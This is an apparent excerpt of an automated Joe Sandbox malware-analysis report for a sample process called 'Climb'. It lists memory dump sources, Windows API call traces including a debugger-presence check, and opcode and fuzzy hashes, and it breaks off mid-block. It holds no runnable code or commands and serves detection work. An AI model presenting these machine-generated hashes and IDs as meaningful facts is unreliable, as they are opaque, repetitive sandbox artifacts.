                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 146820519-0
                                                                                                                                                                          • Opcode ID: b77ffaf52c1da69be34f93faf63092fa06cac2895c58ac052bb3bf17c2d3b975
                                                                                                                                                                          • Instruction ID: dbf32f522861eda11b6db0702d2fa16bc869624893c7519c5fc760907bd0568e
                                                                                                                                                                          • Opcode Fuzzy Hash: b77ffaf52c1da69be34f93faf63092fa06cac2895c58ac052bb3bf17c2d3b975
                                                                                                                                                                          • Instruction Fuzzy Hash: DB127B71A083419FC714CF28C484B6ABBE5FF88318F14895DF8899B292DB71ED45CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$_strcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 306214811-0
                                                                                                                                                                          • Opcode ID: 542cd78d136c76acb2141a6ea1189992c87a7bc593bb33cab22f7ad8c81ca67e
                                                                                                                                                                          • Instruction ID: 5082c6085a4ca40543b4b8aa6be707ba2ed4b5b53fc8a8b37917cc0965629989
                                                                                                                                                                          • Opcode Fuzzy Hash: 542cd78d136c76acb2141a6ea1189992c87a7bc593bb33cab22f7ad8c81ca67e
                                                                                                                                                                          • Instruction Fuzzy Hash: DCA15B31604605EFCB18DF18D5D29A9BBA1FF55314F2084AEE84A8F392DB71ED45CB80
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000B32AF
                                                                                                                                                                            • Part of subcall function 000B327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 000B32B7
                                                                                                                                                                            • Part of subcall function 000B327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000B32C2
                                                                                                                                                                            • Part of subcall function 000B327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000B32CD
                                                                                                                                                                            • Part of subcall function 000B327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 000B32D5
                                                                                                                                                                            • Part of subcall function 000B327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 000B32DD
                                                                                                                                                                            • Part of subcall function 000B3205: RegisterWindowMessageW.USER32(00000004,?,000B2964), ref: 000B325D
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000B2A0A
                                                                                                                                                                          • OleInitialize.OLE32 ref: 000B2A28
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 000F3A0D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1986988660-0
                                                                                                                                                                          • Opcode ID: d5c69ba015abd7f8a60917a952097a8f614d5559e92d8f5f3c9f016a1fefd150
                                                                                                                                                                          • Instruction ID: a7a86747df47b3ce7edc60f1c8cd938070947392071a1c65c8df7eb6fb60aad1
                                                                                                                                                                          • Opcode Fuzzy Hash: d5c69ba015abd7f8a60917a952097a8f614d5559e92d8f5f3c9f016a1fefd150
                                                                                                                                                                          • Instruction Fuzzy Hash: F6717CB0A912018FCB8AEF79FE696953BE4FB59304350412AE409D7A72EB7047C1CF65
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 000B6299
                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 000CFD36
                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000CFD45
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0010FE33
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3500052701-0
                                                                                                                                                                          • Opcode ID: e479cca6fc064e5f87373c11f9638b6823b335633daab29b51dec680c3b3c549
                                                                                                                                                                          • Instruction ID: 23b8042a3bd60a2cb87c0d882591fb845364493a526cebe0613fcb82a31d8ad7
                                                                                                                                                                          • Opcode Fuzzy Hash: e479cca6fc064e5f87373c11f9638b6823b335633daab29b51dec680c3b3c549
                                                                                                                                                                          • Instruction Fuzzy Hash: 6731C871904344AFDB72CF24D855BEABBEDAB02308F00049ED6DA57282C3741A85CB51
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,000E894C,?,00179CE8,0000000C), ref: 000E8A84
                                                                                                                                                                          • GetLastError.KERNEL32(?,000E894C,?,00179CE8,0000000C), ref: 000E8A8E
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 000E8AB9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2583163307-0
                                                                                                                                                                          • Opcode ID: b7a4d09b1c2074c8006a2bdc3a8ece765968a146bfa35a60c58bdcb40cc713cb
                                                                                                                                                                          • Instruction ID: 99cea52cbf0a296316ea59258f5cbcfda365d6c2aa50adbad0f6ca04265c9c30
                                                                                                                                                                          • Opcode Fuzzy Hash: b7a4d09b1c2074c8006a2bdc3a8ece765968a146bfa35a60c58bdcb40cc713cb
                                                                                                                                                                          • Instruction Fuzzy Hash: 570148326051E01EE6606336BC457BE67894B82738F2D452BF91CBB1D3DF7089C15392
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,000E97BA,FF8BC369,00000000,00000002,00000000), ref: 000E9744
                                                                                                                                                                          • GetLastError.KERNEL32(?,000E97BA,FF8BC369,00000000,00000002,00000000,?,000E5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,000D6F41), ref: 000E974E
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 000E9755
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2336955059-0
                                                                                                                                                                          • Opcode ID: 40ed226bc4cca54626a80a48c8f4f0571e251234ef26ad9bc79011b00486f74a
                                                                                                                                                                          • Instruction ID: 3142366d8146448edce39ebf1b7a61c38c4a84831415719f143ef24aa104688e
                                                                                                                                                                          • Opcode Fuzzy Hash: 40ed226bc4cca54626a80a48c8f4f0571e251234ef26ad9bc79011b00486f74a
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D014C37624655AFCF159F9AEC05CAE3B69EB85730B240209FC51AB290EA30DD41DBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 000BF27B
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 000BF289
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000BF29F
                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 000BF2B1
                                                                                                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 001032D8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3288985973-0
                                                                                                                                                                          • Opcode ID: f78320d7e406e836e7e7274e9fb081bfc49c62e92c6bd0702b87f92b747f4fee
                                                                                                                                                                          • Instruction ID: e7331bf91f9755a6cf6c8226f645922587eb88a35ea2835b7dd0404b04283736
                                                                                                                                                                          • Opcode Fuzzy Hash: f78320d7e406e836e7e7274e9fb081bfc49c62e92c6bd0702b87f92b747f4fee
                                                                                                                                                                          • Instruction Fuzzy Hash: 92F05E346043859BEB748BA0DC49FEA33ECEB45345F104928E259934D0DB7095888B26
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 000C3006
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID: CALL
                                                                                                                                                                          • API String ID: 1385522511-4196123274
                                                                                                                                                                          • Opcode ID: 5a9c56c0b0c4f56dba5b3ca16b51a2bb28392b4aa1b0401f23d7e0f3ef8a9e6e
                                                                                                                                                                          • Instruction ID: dda2961846b58bab06c111200b3ac1ccbe0c23b0ce66647b2f2a3ce5ea052499
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a9c56c0b0c4f56dba5b3ca16b51a2bb28392b4aa1b0401f23d7e0f3ef8a9e6e
                                                                                                                                                                          • Instruction Fuzzy Hash: EF2278706083019FC724DF24C884F6EBBE1BF98314F24895DF49A8B6A2D772E941CB52
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 940757fdc9dacdd75ebe910ed325f42228c7db4f88582ea41c608d2f7fa61ffc
                                                                                                                                                                          • Instruction ID: 11a2f0a49ad04acde9fae9008d56df2ed69ba9faa96903b2bf6525a243613f7a
                                                                                                                                                                          • Opcode Fuzzy Hash: 940757fdc9dacdd75ebe910ed325f42228c7db4f88582ea41c608d2f7fa61ffc
                                                                                                                                                                          • Instruction Fuzzy Hash: 5032CC70A00215DFCB24EF54C881FEEB7B4EF15314F148559E89AAB2A2E7B1ED50CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 000F413B
                                                                                                                                                                            • Part of subcall function 000B5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000B55D1,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 000B5871
                                                                                                                                                                            • Part of subcall function 000B3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000B3A76
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                          • String ID: X
                                                                                                                                                                          • API String ID: 779396738-3081909835
                                                                                                                                                                          • Opcode ID: ebe4ec52f866ab15eb0f3de9d4696e9c99d0e2926132a61931a8d728c4c62ac5
                                                                                                                                                                          • Instruction ID: fedbfada365508b293f801c65d94d38d4a570fbf50fa3f21a823127772c86d81
                                                                                                                                                                          • Opcode Fuzzy Hash: ebe4ec52f866ab15eb0f3de9d4696e9c99d0e2926132a61931a8d728c4c62ac5
                                                                                                                                                                          • Instruction Fuzzy Hash: 27219371A002589BDB11DF94D805BEE7BFCAF49304F108059E545B7282DFB49A898F61
                                                                                                                                                                          APIs
                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000B3A3C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                          • Opcode ID: 0066b9b731fddd7370d738a3ec83fca25a06d56345cbb541f8942c343563a4e5
                                                                                                                                                                          • Instruction ID: 55a95782a5bf07aec6b96fb06a626b3a5d989b0a55cc70088845ec11552554af
                                                                                                                                                                          • Opcode Fuzzy Hash: 0066b9b731fddd7370d738a3ec83fca25a06d56345cbb541f8942c343563a4e5
                                                                                                                                                                          • Instruction Fuzzy Hash: 6031D2706047018FD361DF24D8947D7BBE8FB49308F10092EEAD987641E7B5AA88CB52
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsThemeActive.UXTHEME ref: 000B333D
                                                                                                                                                                            • Part of subcall function 000B32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000B32FB
                                                                                                                                                                            • Part of subcall function 000B32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000B3312
                                                                                                                                                                            • Part of subcall function 000B338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,000B3368,?), ref: 000B33BB
                                                                                                                                                                            • Part of subcall function 000B338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,000B3368,?), ref: 000B33CE
                                                                                                                                                                            • Part of subcall function 000B338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00182418,00182400,?,?,?,?,?,?,000B3368,?), ref: 000B343A
                                                                                                                                                                            • Part of subcall function 000B338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00182418,?,?,?,?,?,?,?,000B3368,?), ref: 000B34BB
                                                                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 000B3377
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1550534281-0
                                                                                                                                                                          • Opcode ID: ad45db6a4c6f5ec06c0be5577e92e18b6a73213c80dd8a719dbb7722b29802dc
                                                                                                                                                                          • Instruction ID: 607af1f98a0f829c388f43429dd1782b742b6e920f6e38e6d9859d8bbcb20a1a
                                                                                                                                                                          • Opcode Fuzzy Hash: ad45db6a4c6f5ec06c0be5577e92e18b6a73213c80dd8a719dbb7722b29802dc
                                                                                                                                                                          • Instruction Fuzzy Hash: 02F05E31554744AFD7026F60FE1ABA537E0B709B1AF144816FE088A9E3CBBA93D18B50
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 252777609-0
                                                                                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                          • Instruction ID: 76855bf556a9725c24be06c659a4d552f4372f7c31ad6852736516dc86473637
                                                                                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                          • Instruction Fuzzy Hash: 5831C070A00205EBC758DF58D484B69FBA6FB49300F2886A6E409CB352D772EDC1CBE0
                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 000BCEEE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1385522511-0
                                                                                                                                                                          • Opcode ID: 83d752f47645f603928c24cecfdc8cce6cf44fe0f0b4d7f9171a3b7aaf192c2a
                                                                                                                                                                          • Instruction ID: 5d4b5fad2720cf6aabdcce32c3737c3029166e0af45f308fde1fe230500e6b02
                                                                                                                                                                          • Opcode Fuzzy Hash: 83d752f47645f603928c24cecfdc8cce6cf44fe0f0b4d7f9171a3b7aaf192c2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 3132AE74A00205AFEB24CF54C884EFEBBB5FF45314F198069E956AB291C7B4EE85CB50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                                                          • Opcode ID: 468032858832d5a57f84f0393167c9af3b57b104d14be06f7ce5b6e05e49b31a
                                                                                                                                                                          • Instruction ID: 172203385cf851adc5c39073df596fd8ce00bb9d1fbd40aab1426cf0fd2fbcd8
                                                                                                                                                                          • Opcode Fuzzy Hash: 468032858832d5a57f84f0393167c9af3b57b104d14be06f7ce5b6e05e49b31a
                                                                                                                                                                          • Instruction Fuzzy Hash: 71D14D74A04209EFCF24EF98D8819EDBBB5FF58310F144169E915AB292DB31AE51CF90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
